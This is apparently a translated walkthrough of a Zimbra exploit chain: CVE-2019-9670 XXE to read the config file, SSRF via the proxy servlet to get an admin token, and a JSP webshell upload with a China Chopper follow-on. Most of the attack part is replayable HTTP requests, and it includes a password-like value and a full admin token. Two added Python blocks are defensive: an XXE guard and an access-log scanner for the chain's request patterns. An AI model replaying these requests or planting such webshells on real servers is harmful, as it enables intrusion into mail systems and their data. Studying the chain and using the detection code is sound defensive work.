Step 1: read the configuration file via XXE
The CVE-2019-9670 vulnerability is exploited here to read the configuration file. You need to place a DTD file on your VPS and make it reachable over HTTP. For the demonstration I created a repository on GitHub and served the DTD file from there.
In the figure above, the password of the zimbra account is circled in red; note it down, as it will be used later.
DTD file contents are as follows (the four-line listing did not survive extraction; only the closing `">` of two declarations remains):
">
">
The POST request is as follows:
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: mail.****.com
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 436
Connection: close
Cookie: ZM_TEST=true
Upgrade-Insecure-Requests: 1
%dtd;
%all;
]>
aaaaa
&fileContents;
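The XXE in step 1 only works because the SOAP endpoint accepts a request body that declares a DOCTYPE with parameter entities. The following guard is an added example and not code from the original post or from Zimbra: it uses Python's expat bindings to refuse any body that carries a DOCTYPE, disables parameter-entity expansion, and never fetches external entities. The function name, the sample envelope and the DTD sample are constructed for this example; the `urn:zimbraAccount` namespace is the one the post's step 3 refers to.

```python
"""Reject DTDs before a SOAP request body reaches the XML parser."""
import xml.parsers.expat as expat


class DoctypeRejected(ValueError):
    """Raised when a request body carries a DOCTYPE (and so possibly entity declarations)."""


def check_soap_body(body: bytes) -> tuple:
    """Return (accepted, reason) for a SOAP request body.

    SOAP envelopes never need a DTD, and a DTD is exactly where parameter and
    external entity declarations live, so any DOCTYPE is refused outright.
    Parameter entities are never expanded and external entities never fetched,
    so even a DTD that slipped past the check could not read local files.
    """
    parser = expat.ParserCreate()
    # Never expand parameter entities (%name; references), with or without a DTD.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    root = []  # name of the first element seen, for the accept message

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} not allowed in SOAP body")

    def on_external_entity(context, base, system_id, public_id):
        # Returning 0 aborts the parse; no external resource is ever retrieved.
        return 0

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start

    try:
        parser.Parse(body, True)
    except DoctypeRejected as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    return True, f"ok: root element {root[0]}"


# Constructed samples for this example (not captured traffic).
BENIGN_ENVELOPE = (
    b'<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">'
    b'<soap:Body><AuthRequest xmlns="urn:zimbraAccount"/></soap:Body>'
    b'</soap:Envelope>'
)
ENVELOPE_WITH_DTD = b'<!DOCTYPE x [<!ENTITY e "harmless">]><x>&e;</x>'
MALFORMED = b'<a><b></a>'

if __name__ == "__main__":
    for sample in (BENIGN_ENVELOPE, ENVELOPE_WITH_DTD, MALFORMED):
        print(check_soap_body(sample))
```

The check sits in front of whatever SOAP parser the application uses; rejecting the DOCTYPE at this layer means the downstream parser's entity settings no longer decide whether file contents can be exfiltrated.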
Step 2: get low permission token
As the figure above shows, a token has been obtained, but it is not an administrator token. Note it down; it will be used later.
The POST request is as follows:
POST /service/soap HTTP/1.1
Host: mail.****.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 467
Connection: close
Cookie: ZM_TEST=true
Upgrade-Insecure-Requests: 1
zimbra
GzXaU76_s5
Step 3: use SSRF to obtain admin permission token
Add the low-permission token obtained in the previous step to the cookie, change xmlns="urn:zimbraAccount" to xmlns="urn:zimbraAdmin", append ":7071" to the Host header, and use HTTPS for the target in the URL. Then send the request to obtain an admin-permission token.
The POST request is as follows:
POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1
Host: mail.****.com:7071
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 465
Connection: close
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b
Upgrade-Insecure-Requests: 1
zimbra
GzXaU76_s5
Step 4: upload webshell
Add the admin-permission token obtained in the previous step to the cookie, then upload the webshell.
The webshell path is /downloads/k4x6p.jsp. To access the webshell, the admin token must be present in the cookie.
This webshell can be used to write a small secondary webshell, connectable with China Chopper ("kitchen knife"), into another directory that is reachable without a cookie.
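From the defender's side, steps 1, 3 and 4 each leave a distinctive request in the web server's access log: a POST to the Autodiscover servlet, a /service/proxy request whose target points at loopback or the admin port 7071, and a .jsp under /downloads/. The scanner below is an added example, not code from the original post or from Zimbra; it parses constructed combined-format log lines and returns one alert per matching request. Access logs do not contain request bodies, so the Autodiscover rule flags every POST to that path as a review-level indicator rather than a confirmed XXE; the admin port number comes from the post, everything else (rule names, the sample lines, the placeholder .jsp name) is constructed for this example.

```python
"""Flag the request patterns of the Zimbra chain in an HTTP access log."""
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

ADMIN_PORT = 7071  # Zimbra admin SOAP port, the SSRF destination in step 3

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines for this example (not from the post or a real host).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Apr/2019:10:00:01 +0000] "GET /zimbra/ HTTP/1.1" 200 5123',
    '203.0.113.5 - - [01/Apr/2019:10:00:02 +0000] "POST /service/soap HTTP/1.1" 200 467',
    '203.0.113.5 - - [01/Apr/2019:10:00:03 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 503 436',
    '203.0.113.5 - - [01/Apr/2019:10:00:04 +0000] "POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1" 200 465',
    '203.0.113.5 - - [01/Apr/2019:10:00:05 +0000] "POST /service/proxy?target=https://www.example.org/feed.rss HTTP/1.1" 200 1200',
    '203.0.113.5 - - [01/Apr/2019:10:00:06 +0000] "GET /downloads/example.jsp HTTP/1.1" 200 88',
]


def parse_line(line: str):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def internal_target(url: str) -> bool:
    """True if a proxy target points at loopback/private space or the admin port."""
    u = urlparse(url)
    host = u.hostname or ""
    if u.port == ADMIN_PORT or host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname; resolving it is out of scope here
    return ip.is_loopback or ip.is_private or ip.is_link_local


def classify(rec: dict):
    """Return the name of the first rule the record matches, or None."""
    path, _, query = rec["target"].partition("?")
    if rec["method"] == "POST" and path.lower().startswith("/autodiscover/"):
        return "autodiscover_post"          # step 1 entry point; body not visible here
    if path == "/service/proxy":
        for t in parse_qs(query).get("target", []):
            if internal_target(t):
                return "proxy_to_internal"  # step 3: proxy servlet aimed at admin port
    if re.match(r"^/downloads/[^/]+\.jsp$", path, re.IGNORECASE):
        return "jsp_under_downloads"        # step 4: server-side script in a download dir
    return None


def scan(lines):
    """Return one alert dict per log line that matches a rule."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rule = classify(rec)
        if rule:
            alerts.append({"rule": rule, "src": rec["src"], "ts": rec["ts"],
                           "request": rec["target"], "status": rec["status"]})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The proxy rule is the highest-signal one: a legitimate client has no reason to ask the proxy servlet for a loopback address or the admin port, so a single hit is worth an immediate look, whereas the Autodiscover rule needs the request body (or the guard from step 1) to confirm an XXE attempt.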
I mainly did some collation work; thanks to the experts who wrote the analysis articles online.
Reference links:
https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
https://blog.csdn.net/fnmsd/article/details/88657083
http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448
http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd